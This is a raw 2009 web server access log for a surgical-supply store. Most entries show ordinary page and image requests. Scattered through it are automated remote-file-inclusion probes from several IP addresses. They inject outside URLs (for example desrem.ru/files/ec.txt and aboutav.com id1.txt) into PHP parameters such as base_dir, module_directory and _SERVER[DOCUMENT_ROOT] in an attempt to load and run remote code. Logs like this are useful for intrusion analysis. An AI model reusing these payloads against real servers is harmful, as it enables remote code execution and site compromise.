209.25.134.14 - - [20/Jul/2009:04:03:37 -0400] "GET /logs/access_log.Q109051100%20%20//Patch/catalog/admin/modules.php?module_directory=http://aboutav.com//id1.txt????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.206.29.91 - - [20/Jul/2009:04:03:55 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
66.249.68.247 - - [20/Jul/2009:04:04:00 -0400] "GET /images/over-index5_fractred.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
83.206.29.91 - - [20/Jul/2009:04:04:28 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
121.169.189.169 - - [20/Jul/2009:04:04:32 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L31319F455204E70060C203D+M37+ENG HTTP/1.1" 200 77356 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L31319F4253248700625203D+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.37 Safari/530.5"
83.206.29.91 - - [20/Jul/2009:04:04:59 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
123.143.98.5 - - [20/Jul/2009:04:05:04 -0400] "GET /logs/access_log.Q109062800%20%20//Patch/catalog/admin/modules.php?module_directory=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:04:05:04 -0400] "GET //Patch/catalog/admin/modules.php?module_directory=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:04:05:05 -0400] "GET /logs//Patch/catalog/admin/modules.php?module_directory=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
82.195.150.228 - - [20/Jul/2009:04:05:08 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.206.29.91 - - [20/Jul/2009:04:05:17 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
211.15.55.45 - - [20/Jul/2009:04:05:23 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
83.206.29.91 - - [20/Jul/2009:04:05:23 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
202.191.43.177 - - [20/Jul/2009:04:05:25 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.191.43.177 - - [20/Jul/2009:04:05:26 -0400] "GET /logs/access_log.Q109051800/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
123.143.98.5 - - [20/Jul/2009:04:05:45 -0400] "GET /logs/access_log.Q109051100%20%20//Patch/catalog/admin/modules.php?module_directory=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
212.193.229.157 - - [20/Jul/2009:04:06:07 -0400] "GET /logs/access_log.Q109052200/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:06:07 -0400] "GET /admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:06:07 -0400] "GET /logs/admin.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:04:06:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.57.2 - - [20/Jul/2009:04:06:25 -0400] "GET //bbs/skin/ggambo7002_gallery/dq_thumb_engine2.php?path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:04:06:25 -0400] "GET /logs//bbs/skin/ggambo7002_gallery/dq_thumb_engine2.php?path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
210.205.57.2 - - [20/Jul/2009:04:06:25 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_gallery/dq_thumb_engine2.php?path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
116.71.174.182 - - [20/Jul/2009:04:06:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
116.71.174.182 - - [20/Jul/2009:04:06:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
116.71.174.182 - - [20/Jul/2009:04:06:49 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
116.71.174.182 - - [20/Jul/2009:04:06:49 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
210.205.57.2 - - [20/Jul/2009:04:08:22 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_gallery/dq_thumb_engine2.php?path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.206.120.187 - - [20/Jul/2009:04:09:10 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 10268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.206.120.187 - - [20/Jul/2009:04:09:10 -0400] "GET /logs/access_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
211.206.120.187 - - [20/Jul/2009:04:09:10 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
89.188.129.126 - - [20/Jul/2009:04:09:18 -0400] "GET /logs/access_log.Q109052700//vote_main.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
89.188.129.126 - - [20/Jul/2009:04:09:19 -0400] "GET //vote_main.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
89.188.129.126 - - [20/Jul/2009:04:09:19 -0400] "GET /logs//vote_main.php?site_path=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 217 "-" "libwww-perl/5.805"
222.131.116.8 - - [20/Jul/2009:04:09:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:09:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.78.62.84 - - [20/Jul/2009:04:09:39 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:09:39 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:09:39 -0400] "GET /logs/access_log.Q109070500/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [20/Jul/2009:04:09:40 -0400] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.131.116.8 - - [20/Jul/2009:04:09:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:09:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.100.5.136 - - [20/Jul/2009:04:09:40 -0400] "GET //bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.100.5.136 - - [20/Jul/2009:04:09:40 -0400] "GET /logs/access_log.Q109071500%20%20//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.206.120.187 - - [20/Jul/2009:04:09:50 -0400] "GET /logs/access_log.Q109071200///?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
222.131.116.8 - - [20/Jul/2009:04:09:58 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation%20navigation HTTP/1.1" 200 38033 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.78.62.84 - - [20/Jul/2009:04:09:59 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:00 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:01 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:01 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:01 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:02 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):implantation navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:08 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.78.62.84 - - [20/Jul/2009:04:10:09 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:10:10 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:04:10:10 -0400] "GET /logs/access_log.Q109070500%20%20/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.188.129.126 - - [20/Jul/2009:04:10:26 -0400] "GET ///view.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
89.188.129.126 - - [20/Jul/2009:04:10:26 -0400] "GET /logs/error_log.Q109051000%20///view.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
89.188.129.126 - - [20/Jul/2009:04:10:27 -0400] "GET /logs/access_log.Q109052900%20///view.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
89.188.129.126 - - [20/Jul/2009:04:10:28 -0400] "GET /logs///view.php?dir=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.131.116.8 - - [20/Jul/2009:04:10:28 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation HTTP/1.1" 200 38020 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:30 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:31 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
222.131.116.8 - - [20/Jul/2009:04:10:31 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):navigation" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
